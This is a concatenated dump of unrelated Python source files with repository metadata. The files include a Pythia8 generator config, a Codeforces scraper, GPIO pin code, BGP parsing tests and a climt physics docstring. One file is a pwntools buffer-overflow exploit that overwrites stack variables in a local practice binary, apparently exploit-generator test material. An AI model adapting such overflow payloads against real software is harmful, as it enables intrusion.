Create Python module object.
"""
ModuleGravityField.__init__(self)
def _validateParameters(self, params):
"""
Validate parameters.
"""
if (len(params.gravityDir) != 3):
raise ValueError("Gravity direction must be a 3 component list or tuple.")
try:
dirFloat = list(map(float, params.gravityDir))
except:
raise ValueError("Gravity direction must contain floating point values.")
# FACTORIES ////////////////////////////////////////////////////////////
def spatial_database():
"""
Factory associated with GravityField.
"""
return GravityField()
# End of file
| [
"[email protected]"
] | |
6881aba7454b96576813d8e61f3828f6399b7b00 | 0fccee4c738449f5e0a8f52ea5acabf51db0e910 | /genfragments/ThirteenTeV/XXTo4J/XXTo4J_M-50_CTau-1000mm_TuneCUETP8M1_13TeV_pythia8_cff.py | f20e41d229265892646774f2207a200192607813 | [] | no_license | cms-sw/genproductions | f308ffaf3586c19b29853db40e6d662e937940ff | dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4 | refs/heads/master | 2023-08-30T17:26:02.581596 | 2023-08-29T14:53:43 | 2023-08-29T14:53:43 | 11,424,867 | 69 | 987 | null | 2023-09-14T12:41:28 | 2013-07-15T14:18:33 | Python | UTF-8 | Python | false | false | 2,894 | py | COM_ENERGY = 13000. # GeV
MASS_POINT = 50 # GeV
CROSS_SECTION = 1 # pb
CTAU_POINT = 1000 # mm
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(0),
filterEfficiency = cms.untracked.double(1),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(COM_ENERGY),
crossSection = cms.untracked.double(CROSS_SECTION),
maxEventsToPrint = cms.untracked.int32(0),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
"Higgs:useBSM = on",
"HiggsBSM:all = off",
"HiggsBSM:ffbar2A3H2 = on",
"35:m0 = %s" % MASS_POINT,
"36:m0 = %s" % MASS_POINT,
"35:tau0 = %s" % CTAU_POINT,
"36:tau0 = %s" % CTAU_POINT,
"35:0:bRatio = .2",
"35:1:bRatio = .2",
"35:2:bRatio = .2",
"35:3:bRatio = .2",
"35:4:bRatio = .2",
"35:5:bRatio = 0",
"35:9:bRatio = 0",
"35:10:bRatio= 0",
"36:0:bRatio = .2",
"36:1:bRatio = .2",
"36:2:bRatio = .2",
"36:3:bRatio = .2",
"36:4:bRatio = .2",
"36:5:bRatio = 0",
"36:9:bRatio = 0",
"36:10:bRatio = 0",
"35:0:meMode = 100",
"35:1:meMode = 100",
"35:2:meMode = 100",
"35:3:meMode = 100",
"35:4:meMode = 100",
"35:5:meMode = 100",
"35:9:meMode = 100",
"35:10:meMode = 100",
"36:0:meMode = 100",
"36:1:meMode = 100",
"36:2:meMode = 100",
"36:3:meMode = 100",
"36:4:meMode = 100",
"36:5:meMode = 100",
"36:9:meMode = 100",
"36:10:meMode = 100",
"HiggsA3:coup2d = 1",
"HiggsA3:coup2u = 1",
"HiggsA3:coup2H1Z = 0",
"HiggsA3:coup2H2Z = 1",
"HiggsA3:coup2l = 0",
"HiggsA3:coup2HchgW = 0",
"HiggsH2:coup2d = 1",
"HiggsH2:coup2u = 1",
"HiggsH2:coup2l = 0",
"HiggsH2:coup2Z = 0",
"HiggsH2:coup2W = 0",
"HiggsH2:coup2H1H1 = 0",
"HiggsH2:coup2A3A3 = 0",
"35:onMode = off",
"35:onIfAny = 1 2 3 4 5",
"36:onMode = off",
"36:onIfAny = 1 2 3 4 5",
),
parameterSets = cms.vstring(
'pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters'
)
)
)
ProductionFilterSequence = cms.Sequence(generator)
| [
"[email protected]"
] | |
a31d45fd9b74a17216e283571c46b257948e4c6a | 589d9fa803abec59a8375b925d7ec51d345fc227 | /coolkit/lib/Contest.py | 90ccd8a06e5c6881eaa6cc858f4378e4cb14c919 | [
"MIT"
] | permissive | kishorerabha/CoolKit | aff2d969cc7dbd4fce86b5b478979e8b7460790d | d411822b29dfbabdaaeab844716767810f3b1e25 | refs/heads/master | 2020-03-31T04:54:49.984680 | 2018-10-06T01:26:47 | 2018-10-06T11:06:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,679 | py | #!/usr/bin/env python3
import os
import sys
try:
import shutil
import grequests as grq
from terminaltables import AsciiTable
from bs4 import BeautifulSoup
except:
err = """
You haven't installed the required dependencies.
"""
import sys, traceback
traceback.print_exc()
print(err)
sys.exit(0)
from .Colour import Colour
from .Constants import Const
from .files import verify_folder, verify_file
from .Problem import Problem
from .Soup import Soup
from .srbjson import srbjson
from .utils import utils
class Contest:
def __init__(self,c_name,c_type='contest',c_title=''):
# trivially cached
self.c_name = str(c_name)
self.c_type = c_type
# fetchable variables
self.announce_arr = []
self.c_title = c_title
self.hash = ""
self.is_good = False # loaded fully or not
self.num_prob = -1
self.p_name_list = []
# non cached
self.dir = Const.cache_dir + '/' + self.c_type + '/' + self.c_name
self.link = "https://codeforces.com/"+self.c_type+"/"+self.c_name
self.prob_mapp = {}
srbjson.dump_data({
"c_name":self.c_name,
"c_type":self.c_type
},
self.dir+ "/config",
srbjson.contest_template)
self._load_contest() # pick cached data
# haven't called fetch_contest from constructor as it may be slow
# call it seperately, its safe as it wont refetch things if loaded
def pull_contest(self,force=False):
self.fetch_contest(force)
self.dump_contest()
def fetch_contest(self,force=False):
'''
do fetching and dumping both
'''
if(force): # remove every detail regarding that contest
shutil.rmtree(self.dir)
self._load_contest()
self.prob_mapp = {}
if(self.is_good): # return if cached
return
'''
by now there is no useless folder and map entry
'''
self._fetch_contest_home()
if (len(self.prob_mapp) == 0):
print(Colour.RED+'failed to fetch contest home'+Colour.END)
return
'''
by now there are only and all folders on all problems in contest
and those folders are only and all mapped into prob_mapp
missing entries are added by _fetch_contest_home()
they might be bad or good depending on they are newly created or old ones respectively
'''
failed_links = []
for key in self.p_name_list:
if(not self.prob_mapp[key].is_good):
failed_links.append(self.prob_mapp[key].link)
'''
only and only links to bad problems, empty folders exists for all
'''
tries = 1
while(len(failed_links) > 0 and tries <= 2):
print(Colour.YELLOW + str(tries)+': try to fetch problems' + Colour.END)
failed_links = self._fetch_prob_test_cases(failed_links)
tries += 1
if(len(failed_links) > 0):
for a in failed_links:
print(Colour.RED + 'failed to fetch ' + a + Colour.END)
self.is_good = False
else:
self.is_good = True
def dump_contest(self):
srbjson.dump_data({
"ann_arr":self.announce_arr,
"c_title":self.c_title,
"is_good":self.is_good,
"num_prob":self.num_prob,
"p_name_list":self.p_name_list
},
self.dir+ "/config",
srbjson.contest_template)
def _fetch_prob_test_cases(self,links):
"""
Method to download prob_test_cases for all problems
"""
p_names = [ link.split('/')[-1] for link in links ]
print(Colour.YELLOW + 'fetching problems ... ' + Colour.PURPLE, p_names, Colour.END)
rs = (grq.get(link) for link in links)
responses = grq.map(rs)
failed_requests = []
for response in responses:
if response is not None and response.status_code == 200:
soup = BeautifulSoup(response.text, 'html.parser')
p_name = response.url.split('/')[-1]
self.prob_mapp[p_name].load_from_soup(soup)
if(not self.prob_mapp[p_name].is_good):
failed_requests += [resopnse.url]
continue
self.prob_mapp[p_name].dump_problem()
else:
failed_requests += [response.url]
return failed_requests
def _load_contest(self):
'''
loads contest from cache if exists else create an empty contest and loads it up
also cleans useless folders in prob folder if they aren't in config of p_name_list
'''
data = srbjson.extract_data(self.dir+'/config',srbjson.contest_template)
self.announce_arr = data['ann_arr']
self.c_title = data['c_title']
self.hash = data['hash']
self.is_good = data['is_good']
self.num_prob = data['num_prob']
self.p_name_list = data['p_name_list']
# problems
path = self.dir + '/prob/'
verify_folder(path)
good_probs = 0
prob_dir_list = [ (a if os.path.isdir(path+a) else None) for a in os.listdir(path)]
prob_dirs = []
for prob in prob_dir_list: # keep only folders
if(prob): prob_dirs += [prob]
for a in prob_dirs:
self.prob_mapp[a] = Problem(a,self.c_name,self.c_type)
if(self.prob_mapp[a].is_good and a in self.p_name_list): # remove waste folders
good_probs += 1
else:
print(Colour.RED+'Removed Bad Problem : '+a+Colour.END)
shutil.rmtree(self.prob_mapp[a].dir)
del self.prob_mapp[a]
if(self.num_prob == -1):
print(Colour.YELLOW+'Contest not configured yet'+Colour.END)
self.is_good = False
elif(good_probs != self.num_prob):
print(Colour.YELLOW+'expected',self.num_prob,'probs got',good_probs,'good probs',Colour.END)
self.is_good = False
def display_contest(self):
table_data = [[Colour.BOLD+Colour.GREEN+self.c_title+Colour.END]]
print(AsciiTable(table_data).table)
table_data = [['#','Name','submissions','Link']]
for prob in self.prob_mapp.values():
table_data.append([prob.p_name,prob.p_title,prob.subm,prob.link])
print(AsciiTable(table_data).table)
table_data = [['S no','Announcements']]
for a,ann in enumerate(self.announce_arr):
table_data.append([a+1,utils.shrink(ann,max_len=80)])
print(AsciiTable(table_data).table)
def _fetch_contest_home(self):
'''
tries to fetch these things and also dump them if fetched
contest:
ann_arr
c_title
prob_mapp
num_prob
p_name_list
problem:
p_title
subm
CAN BE CALLED TO FORCEFULLY UPDATE DATA, say subm during the contest
'''
soup = Soup.get_soup("https://codeforces.com/"+self.c_type+"/"+self.c_name)
if(soup is None):
return
# title
rtable = soup.findAll('table',{'class':'rtable'})[0]
self.c_title = rtable.findAll('a')[0].get_text().strip()
# prob table
prob_table = soup.findAll('table',{'class':'problems'})[0]
prob_list = prob_table.findAll('tr')[1:]
p_name_list = []
for problem in prob_list:
p_name = problem.findAll('td')[0].get_text().strip()
p_name_list.append(p_name)
p_title = problem.findAll('td')[1].findAll('a')[0].get_text().strip()
subm = problem.findAll('td')[3].get_text().strip().split('x')[-1]
if(not p_name in self.prob_mapp.keys()):
self.prob_mapp[p_name] = Problem(p_name,self.c_name,self.c_type,p_title)
self.prob_mapp[p_name].p_title = p_title
self.prob_mapp[p_name].subm = subm
self.num_prob = len(self.prob_mapp)
self.p_name_list = p_name_list
# announcements
atable = soup.findAll('table',{'class':'problem-questions-table'})[0]
announce_arr = atable.findAll('tr')[1:]
for ann in announce_arr:
ann = ann.findAll('td')[-1].get_text().strip()
self.announce_arr += [ann]
@staticmethod
def upcoming_contest(display=False):
url = "http://codeforces.com/contests"
soup = Soup.get_soup(url)
contests = [['id','title','','time','dur.','link']]
if(soup is None):
print(Colour.RED+'unable to fetch upcoming contests list'+Colour.END)
return contests
datatable = soup.find_all('div',{'class':'datatable'})[0].find_all('table')[0]
contest_rows = datatable.find_all('tr')[1:]
for row in contest_rows:
c_name = row['data-contestid']
c_type = 'contests'
data = row.find_all('td')
title = data[0].get_text().strip()
title = Contest.get_short_contest_title(title)
title = utils.shrink(title)
writer = data[1].get_text().strip()
time = data[2].get_text().strip()
time = Contest.get_formatted_time(time)
duration = data[3].get_text().strip()
link = "www.codeforces.com/"+c_type+"/"+c_name
contests.append([c_name,title,writer,time,duration,link])
if(display is True): print(AsciiTable(contests).table)
return contests
@staticmethod
def get_number_of_problems(c_name,c_type='contest',cacheing=False):
# TODO implementing caching else it is slow
url = "https://codeforces.com/"+c_type+"/"+c_name
soup = Soup.get_soup(url)
if(soup is None):
return "-",[]
prob_table = soup.findAll('table',{'class':'problems'})[0]
prob_list = prob_table.findAll('tr')[1:]
p_name_list = []
for problem in prob_list:
p_name = problem.findAll('td')[0].get_text().strip()
p_name_list += [p_name]
return str(len(prob_list)) , p_name_list
@staticmethod
def get_short_contest_title(title):
title = title.replace("Codeforces","CF")
title = title.replace("Educational","EDU")
title = title.replace("Elimination","ELM")
title = title.replace("Rated","R")
title = title.replace("rated","R")
title = title.replace("Round","RnD")
title = title.replace("round","RnD")
title = title.replace("Div. 3","D3")
title = title.replace("Div. 2","D2")
title = title.replace("Div. 1","D1")
title = title.replace("div. 3","D3")
title = title.replace("div. 2","D2")
title = title.replace("div. 1","D1")
return title
@staticmethod
def get_formatted_time(time,offset = '03:00'):
date,time = time.split()
month,date = date.split('/')[:-1]
date = int(date)
hour,mins = time.split(':')
hour = int(hour)
mins = int(mins)
off_h,off_m = offset.split(':')
off_h = int(off_h)
off_m = int(off_m)
mins = mins + off_m
if(mins >= 60):
mins -= 60
hour += 1
hour = hour + off_h
if(hour >= 24):
hour -= 24
date +=1
return str(date).zfill(2) + '-' + month + ' ' + str(hour).zfill(2) + ':' + str(mins).zfill(2)
| [
"[email protected]"
] | |
a445d7c740160a7e33848149248180741d45af83 | 077a17b286bdd6c427c325f196eb6e16b30c257e | /00_BofVar-unit-tests/07_32/remenissions-work/exploit-BofVar-3.py | b8ea6ed45800852876c676f658926951160fa819 | [] | no_license | KurSh/remenissions_test | 626daf6e923459b44b82521aa4cb944aad0dbced | 9dec8085b62a446f7562adfeccf70f8bfcdbb738 | refs/heads/master | 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | from pwn import *
import time
import sys
import signal
import sf
target = process("./chall-test_BofVar-07-x86")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=32)
bof_payload.set_input_start(0x5a)
bof_payload.add_int32(0x28, 0xdead)
bof_payload.add_int32(0x24, 0xdead)
bof_payload.add_int32(0x20, 0xdeae)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
def check_verification_done():
while True:
if os.path.exists("pwned") or os.path.exists("rip"):
sys.exit(0)
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
try:
while True:
check_verification_done()
except Exception:
print("Exploit timed out")
| [
"[email protected]"
] | |
f69ce16005e44fc509989b7f6e007b21ae1b0ae5 | ff7e133648566b8a705cb5a214be8a82df5101d9 | /algorithm/work_1/test.py | a15a7f356574f4bf7509cf40eb11373a9185fc38 | [] | no_license | hoik92/Algorithm | 231433193ecba4a48ef830cab2c5b0115fa7246d | 4085b83a692a211e10503949d4518205d404dcaf | refs/heads/master | 2020-04-27T06:27:06.777255 | 2019-04-18T23:48:30 | 2019-04-18T23:48:30 | 174,108,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 657 | py | import sys
sys.stdin = open('input.txt', 'r')
def mx_mn(T):
mxidx, mnidx = 0, 0
for i in range(len(T)):
if T[mxidx] < T[i]:
mxidx = i
if T[mnidx] > T[i]:
mnidx = i
return mxidx, mnidx
for tc in range(1, 11):
D = int(input())
T = list(map(int, input().split()))
for x in range(D):
mxidx, mnidx = mx_mn(T)
T[mxidx] -= 1
T[mnidx] += 1
mxidx, mnidx = mx_mn(T)
print(f"#{tc} {T[mxidx] - T[mnidx]}")
# for x in range(D):
# T[T.index(max(T))] -= 1
# T[T.index(min(T))] += 1
# print(f"#{tc} {max(T) - min(T)}") | [
"[email protected]"
] | |
e529eec44443a0babb5409cc279d28f8501b184d | c549044b12e835827258d693f21e91cc614b303e | /venv/lib/python3.8/site-packages/gpiozero/pins/rpigpio.py | 8a085c8302e2d43241f444f2e47b8d5b6cb54bab | [] | no_license | Abbalon/PiHome-SmartLock | 5484038f87199bf9d341485507474a7c5c8f1519 | 9ad6f04e8da327cc26c51b177a9ce252d7eabac9 | refs/heads/master | 2022-12-14T08:40:07.706787 | 2020-09-13T17:43:18 | 2020-09-13T17:43:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,757 | py | # GPIO Zero: a library for controlling the Raspberry Pi's GPIO pins
# Copyright (c) 2015-2019 Dave Jones <[email protected]>
# Copyright (c) 2016 Andrew Scheller <[email protected]>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division,
)
str = type('')
from RPi import GPIO
from .local import LocalPiFactory, LocalPiPin
from ..exc import (
PinInvalidFunction,
PinSetInput,
PinFixedPull,
PinInvalidPull,
PinInvalidState,
PinInvalidBounce,
PinPWMFixedValue,
)
class RPiGPIOFactory(LocalPiFactory):
"""
Extends :class:`~gpiozero.pins.local.LocalPiFactory`. Uses the `RPi.GPIO`_
library to interface to the Pi's GPIO pins. This is the default pin
implementation if the RPi.GPIO library is installed. Supports all features
including PWM (via software).
Because this is the default pin implementation you can use it simply by
specifying an integer number for the pin in most operations, e.g.::
from gpiozero import LED
led = LED(12)
However, you can also construct RPi.GPIO pins manually if you wish::
from gpiozero.pins.rpigpio import RPiGPIOFactory
from gpiozero import LED
factory = RPiGPIOFactory()
led = LED(12, pin_factory=factory)
.. _RPi.GPIO: https://pypi.python.org/pypi/RPi.GPIO
"""
def __init__(self):
super(RPiGPIOFactory, self).__init__()
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
self.pin_class = RPiGPIOPin
def close(self):
super(RPiGPIOFactory, self).close()
GPIO.cleanup()
class RPiGPIOPin(LocalPiPin):
"""
Extends :class:`~gpiozero.pins.local.LocalPiPin`. Pin implementation for
the `RPi.GPIO`_ library. See :class:`RPiGPIOFactory` for more information.
.. _RPi.GPIO: https://pypi.python.org/pypi/RPi.GPIO
"""
GPIO_FUNCTIONS = {
'input': GPIO.IN,
'output': GPIO.OUT,
'i2c': GPIO.I2C,
'spi': GPIO.SPI,
'pwm': GPIO.HARD_PWM,
'serial': GPIO.SERIAL,
'unknown': GPIO.UNKNOWN,
}
GPIO_PULL_UPS = {
'up': GPIO.PUD_UP,
'down': GPIO.PUD_DOWN,
'floating': GPIO.PUD_OFF,
}
GPIO_EDGES = {
'both': GPIO.BOTH,
'rising': GPIO.RISING,
'falling': GPIO.FALLING,
}
GPIO_FUNCTION_NAMES = {v: k for (k, v) in GPIO_FUNCTIONS.items()}
GPIO_PULL_UP_NAMES = {v: k for (k, v) in GPIO_PULL_UPS.items()}
GPIO_EDGES_NAMES = {v: k for (k, v) in GPIO_EDGES.items()}
def __init__(self, factory, number):
super(RPiGPIOPin, self).__init__(factory, number)
self._pull = 'up' if self.factory.pi_info.pulled_up(repr(self)) else 'floating'
self._pwm = None
self._frequency = None
self._duty_cycle = None
self._bounce = -666
self._edges = GPIO.BOTH
GPIO.setup(self.number, GPIO.IN, self.GPIO_PULL_UPS[self._pull])
def close(self):
self.frequency = None
self.when_changed = None
GPIO.cleanup(self.number)
def output_with_state(self, state):
self._pull = 'floating'
GPIO.setup(self.number, GPIO.OUT, initial=state)
def input_with_pull(self, pull):
if pull != 'up' and self.factory.pi_info.pulled_up(repr(self)):
raise PinFixedPull('%r has a physical pull-up resistor' % self)
try:
GPIO.setup(self.number, GPIO.IN, self.GPIO_PULL_UPS[pull])
self._pull = pull
except KeyError:
raise PinInvalidPull('invalid pull "%s" for pin %r' % (pull, self))
def _get_function(self):
return self.GPIO_FUNCTION_NAMES[GPIO.gpio_function(self.number)]
def _set_function(self, value):
if value != 'input':
self._pull = 'floating'
if value in ('input', 'output') and value in self.GPIO_FUNCTIONS:
GPIO.setup(self.number, self.GPIO_FUNCTIONS[value], self.GPIO_PULL_UPS[self._pull])
else:
raise PinInvalidFunction('invalid function "%s" for pin %r' % (value, self))
def _get_state(self):
if self._pwm:
return self._duty_cycle
else:
return GPIO.input(self.number)
def _set_state(self, value):
if self._pwm:
try:
self._pwm.ChangeDutyCycle(value * 100)
except ValueError:
raise PinInvalidState('invalid state "%s" for pin %r' % (value, self))
self._duty_cycle = value
else:
try:
GPIO.output(self.number, value)
except ValueError:
raise PinInvalidState('invalid state "%s" for pin %r' % (value, self))
except RuntimeError:
raise PinSetInput('cannot set state of pin %r' % self)
def _get_pull(self):
return self._pull
def _set_pull(self, value):
if self.function != 'input':
raise PinFixedPull('cannot set pull on non-input pin %r' % self)
if value != 'up' and self.factory.pi_info.pulled_up(repr(self)):
raise PinFixedPull('%r has a physical pull-up resistor' % self)
try:
GPIO.setup(self.number, GPIO.IN, self.GPIO_PULL_UPS[value])
self._pull = value
except KeyError:
raise PinInvalidPull('invalid pull "%s" for pin %r' % (value, self))
def _get_frequency(self):
return self._frequency
def _set_frequency(self, value):
if self._frequency is None and value is not None:
try:
self._pwm = GPIO.PWM(self.number, value)
except RuntimeError:
raise PinPWMFixedValue('cannot start PWM on pin %r' % self)
self._pwm.start(0)
self._duty_cycle = 0
self._frequency = value
elif self._frequency is not None and value is not None:
self._pwm.ChangeFrequency(value)
self._frequency = value
elif self._frequency is not None and value is None:
self._pwm.stop()
self._pwm = None
self._duty_cycle = None
self._frequency = None
def _get_bounce(self):
return None if self._bounce == -666 else (self._bounce / 1000)
def _set_bounce(self, value):
if value is not None and value < 0:
raise PinInvalidBounce('bounce must be 0 or greater')
f = self.when_changed
self.when_changed = None
try:
self._bounce = -666 if value is None else int(value * 1000)
finally:
self.when_changed = f
def _get_edges(self):
return self.GPIO_EDGES_NAMES[self._edges]
def _set_edges(self, value):
f = self.when_changed
self.when_changed = None
try:
self._edges = self.GPIO_EDGES[value]
finally:
self.when_changed = f
def _call_when_changed(self, channel):
super(RPiGPIOPin, self)._call_when_changed()
def _enable_event_detect(self):
GPIO.add_event_detect(
self.number, self._edges,
callback=self._call_when_changed,
bouncetime=self._bounce)
def _disable_event_detect(self):
GPIO.remove_event_detect(self.number)
| [
"[email protected]"
] | |
0c233a30fd722986b1ae834d7faed0df4ed8cd18 | a40d2a4c1704c080b0454805218b7dd07f28218c | /yabgp/tests/unit/message/attribute/test_extcommunity.py | bb67218e7535e1898aafbbbca3858bf10dd9a231 | [
"Apache-2.0"
] | permissive | plucena24/yabgp | e524b2c58b262ddba868a93cbbab3c5a6f3419aa | bc817ed74b21743797faee565fe54efb1f4b85c7 | refs/heads/master | 2023-08-21T02:19:20.937686 | 2015-08-04T09:30:49 | 2015-08-04T09:30:49 | 40,301,596 | 0 | 0 | Apache-2.0 | 2023-08-14T21:29:51 | 2015-08-06T11:35:33 | Python | UTF-8 | Python | false | false | 4,466 | py | # Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" Test extended Community attribute """
import unittest
from yabgp.common import constants as bgp_cons
from yabgp.common import exception as excep
from yabgp.message.attribute.extcommunity import ExtCommunity
class TestExtCommunity(unittest.TestCase):
def test_parse_rt0(self):
# Route Target,Format AS(2bytes):AN(4bytes)
ext_community = ExtCommunity.parse(value=b'\x00\x02\x00\x64\x00\x00\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RT_0, '100:12')], ext_community)
def test_construct_rt0(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RT_0, '100:12')])
self.assertEqual(b'\xc0\x10\x08\x00\x02\x00\x64\x00\x00\x00\x0c', ext_community)
def test_parse_rt1(self):
# Route Target,Format IPv4 address(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x01\x02\x0a\x0a\x0a\x0a\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RT_1, '10.10.10.10:12')], ext_community)
def test_construct_rt1(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RT_1, '10.10.10.10:12')])
self.assertEqual(b'\xc0\x10\x08\x01\x02\x0a\x0a\x0a\x0a\x00\x0c', ext_community)
def test_parse_rt2(self):
# Route Target,Format AS(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x02\x02\x00\x01\x00\x01\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RT_2, '65537:12')], ext_community)
def test_construct_rt2(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RT_2, '65537:12')])
self.assertEqual(b'\xc0\x10\x08\x02\x02\x00\x01\x00\x01\x00\x0c', ext_community)
def test_parse_ro0(self):
# Route Origin,Format AS(2bytes):AN(4bytes)
ext_community = ExtCommunity.parse(value=b'\x00\x03\x00\x64\x00\x00\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RO_0, '100:12')], ext_community)
def test_construct_ro0(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RO_0, '100:12')])
self.assertEqual(b'\xc0\x10\x08\x00\x03\x00\x64\x00\x00\x00\x0c', ext_community)
def test_parse_ro1(self):
# Route Origin,Format IPv4 address(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x01\x03\x0a\x0a\x0a\x0a\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RO_1, '10.10.10.10:12')], ext_community)
def test_construct_ro1(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RO_1, '10.10.10.10:12')])
self.assertEqual(b'\xc0\x10\x08\x01\x03\x0a\x0a\x0a\x0a\x00\x0c', ext_community)
def test_parse_ro2(self):
# Route Origin,Format AS(4bytes):AN(2bytes)
ext_community = ExtCommunity.parse(value=b'\x02\x03\x00\x01\x00\x01\x00\x0c')
self.assertEqual([(bgp_cons.BGP_EXT_COM_RO_2, '65537:12')], ext_community)
def test_construct_ro2(self):
ext_community = ExtCommunity.construct(value=[(bgp_cons.BGP_EXT_COM_RO_2, '65537:12')])
self.assertEqual(b'\xc0\x10\x08\x02\x03\x00\x01\x00\x01\x00\x0c', ext_community)
def test_parse_invalid_length(self):
# invalid length
self.assertRaises(excep.UpdateMessageError, ExtCommunity.parse,
b'\x00\x00\x02\x00\x64\x00\x00\x00\x0c')
try:
ExtCommunity.parse(value=b'\x00\x00\x02\x00\x64\x00\x00\x00\x0c')
except excep.UpdateMessageError as e:
self.assertEqual(bgp_cons.ERR_MSG_UPDATE_ATTR_LEN, e.sub_error)
def test_parse_unknow(self):
# unknow
hex_tmp = b'\x09\x03\x00\x01\x00\x01\x00\x0c'
ext_community = ExtCommunity.parse(value=hex_tmp)
self.assertEqual(bgp_cons.BGP_EXT_COM_UNKNOW, ext_community[0][0])
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
ff20799864d9ab1630cd84985b26232f955a7bad | 8ed9296cf14cbd48ad6c6ba977a4eddfb6158ec3 | /src/idealised/simple_physics/simple_physics_custom.py | f427bcf74ae3c3f900988a4ea169b9ce6119018d | [
"BSD-3-Clause"
] | permissive | JoyMonteiro/CliMT | 51191c8e44eef28057971dd29de8e40c0bd3ef97 | 0949ed3a3a125638072351d7277ae4b956956d35 | refs/heads/master | 2021-04-09T17:45:56.369908 | 2016-10-28T08:32:26 | 2016-10-28T08:32:26 | 28,734,117 | 2 | 0 | null | 2015-01-03T03:45:23 | 2015-01-03T03:45:22 | null | UTF-8 | Python | false | false | 6,114 | py | import numpy as np
from component import Component
import _simple_physics_custom as phys
from grid import Grid
class simple_physics_custom(Component):
"""
Interface to the simple physics package. This is a modified version which allows the
user to switch off any of the three routines : large scale condensation, surface fluxes,
or boundary layer parameterisation
Reed and Jablonowski 2012:
title = {Idealized tropical cyclone simulations of intermediate complexity: a test case for {AGCMs}}
journal = {Journal of Advances in Modeling Earth Systems}
Instantiation
============
sp = climt.simple_physics(<args>)
where <args> include the following REQUIRED arguments:
Name Dims Meaning Units Default Notes
grid (object) grid generated by by another
component which is used to
get latitudes for calculating
the forcing
dt 0 The (constant) time step to be seconds
used by the physics
Ts 2 The surface temperature to use IF
use_ext_ts is True (= 1)
and the following OPTIONAL arguments (1 indicates True, use 0 for False):
Name Dims Meaning Units Default Notes
cyclone 0 Integer indicating if 1
the physics must simulate
a cyclone. If 0, it
will simulate a moist baroclinic
environment. This option is used
only to generate surface temperatures.
This will be ignored if external
surface temperatures are
prescribed
lsc 0 Integer indicating whether
large scale condensation is active 1
pbl 0 Integer indicating whether 1
boundary layer is active
surf_flux 0 Integer indicating whether 1
surface fluxes are active
use_ext_ts 0 Integer indicating whether 0
surface temperature is externally
specified (else internal default
corresponding to constant value
of 302.15 K is used)
qflux 0 Integer indicating whether surface 1
latent heat fluxes are calculated
momflux 0 Integer indicating whether surface 1
momentum fluxes are calculated
tflux 0 Integer indicating whether surface 1
sensible heat fluxes are calculated
Usage
=====
call instance directly to get increments
inc = sp(<args>)
